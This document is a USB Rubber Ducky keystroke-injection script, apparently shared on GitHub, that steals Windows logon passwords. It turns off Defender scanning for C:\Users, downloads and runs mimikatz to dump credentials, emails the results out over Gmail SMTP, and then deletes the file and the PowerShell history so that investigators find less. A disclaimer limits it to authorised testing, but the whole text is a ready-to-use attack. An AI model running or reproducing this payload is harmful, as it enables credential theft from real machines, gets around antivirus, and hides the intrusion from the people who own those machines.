REM Title: windows password grabber
REM Author makozort, https://github.com/makozort
REM Target: windows 10 (with admin access), might work with windows 7 idk
REM THIS IS FOR AUTHORISED USE ON MACHINES YOU EITHER OWN OR HAVE BEEN GIVEN ACCESS TO PEN TEST, MAKOZORT IS NOT LIABLE FOR ANY MISUSE OF THIS SCRIPT
REM -------------- set default delay based on the target computer's speed, 350 is around mid range (I think)
DEFAULT_DELAY 350
REM ------------- first delay is 1 second (you may need more) to let windows set up the "keyboard"
DELAY 1000
REM ------------ open powershell as admin and set an exclusion path in the C:\Users path
GUI r
STRING powershell
CTRL-SHIFT ENTER
DELAY 600
ALT y
STRING Set-MpPreference -ExclusionPath C:\Users
ENTER
STRING exit
ENTER
REM ------------- download mimikatz
GUI r
STRING cmd
CTRL-SHIFT ENTER
DELAY 600
ALT y
STRING powershell (new-object System.Net.WebClient).DownloadFile('LINK TO MIMIKATZ.EXE DOWNLOAD HERE','%temp%\pw.exe')
ENTER
REM ------------ run the following mimikatz commands and print results in a new txt file
DELAY 4000
STRING %TEMP%\pw.exe > c:\pwlog.txt & type pwlog.txt;
ENTER
STRING privilege::debug
ENTER
STRING sekurlsa::logonPasswords full
ENTER
STRING exit
ENTER
REM --------- delete mimikatz
STRING del %TEMP%\pw.exe
ENTER
STRING exit
ENTER
REM ------------- email the pwlog.txt to your email
GUI r
STRING powershell
CTRL-SHIFT ENTER
DELAY 600
ALT y
STRING Remove-MpPreference -ExclusionPath C:\Users
ENTER
STRING $SMTPServer = 'smtp.gmail.com'
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
STRING $SMTPInfo.EnableSsl = $true
ENTER
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@
SHIFT 2
STRING gmail.com', 'PASSWORDHERE');
ENTER
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ReportEmail.From = 'THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@
SHIFT 2
STRING gmail.com'
ENTER
STRING $ReportEmail.To.Add('THE-PART-OF-RECEIVERS-EMAIL-BEFORE-THE-@
SHIFT 2
STRING gmail.com')
ENTER
STRING $ReportEmail.Subject = 'Hello from the ducky'
ENTER
STRING $ReportEmail.Body = 'Attached is your duck report.'
ENTER
STRING $ReportEmail.Attachments.Add('c:\pwlog.txt')
ENTER
STRING $SMTPInfo.Send($ReportEmail)
ENTER
DELAY 4000
STRING exit
ENTER
REM ------ cleanup time
GUI r
STRING powershell
CTRL-SHIFT ENTER
DELAY 600
ALT y
REM ---------- delete the txt file
STRING del c:\pwlog.txt
ENTER
REM ------- remove powershell history (this probably won't be enough to remove all traces of you, this is just to prevent initial investigations)
STRING Remove-Item (Get-PSreadlineOption).HistorySavePath
ENTER
STRING exit
ENTER
REM ------ lock the pc
GUI l